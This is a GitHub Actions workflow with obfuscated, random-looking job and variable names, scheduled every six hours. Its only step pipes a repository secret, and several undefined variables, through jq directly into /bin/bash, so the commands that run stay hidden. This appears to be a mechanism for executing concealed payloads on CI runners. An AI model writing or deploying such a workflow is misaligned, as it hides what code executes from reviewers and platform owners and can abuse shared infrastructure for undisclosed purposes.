name: limiaozhen5421
on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: limiaozhen5421
        env:
          if61295: ${{ secrets.if61295 }}
        run: |
          echo $if61295 | jq -r .otrie51 | /bin/bash
          echo $ulq02414 | jq -r .oalj325 | /bin/bash
          echo $nrk47 | jq -r .y361 | /bin/bash
          echo $qqy63 | jq -r .lrp740 | /bin/bash
          echo $polfg16778 | jq -r .x63 | /bin/bash
          echo $xs1656 | jq -r .dsjhz288 | /bin/bash
          echo $idgp3593 | jq -r .q5 | /bin/bash
          echo $txkr71077 | jq -r .od73 | /bin/bash

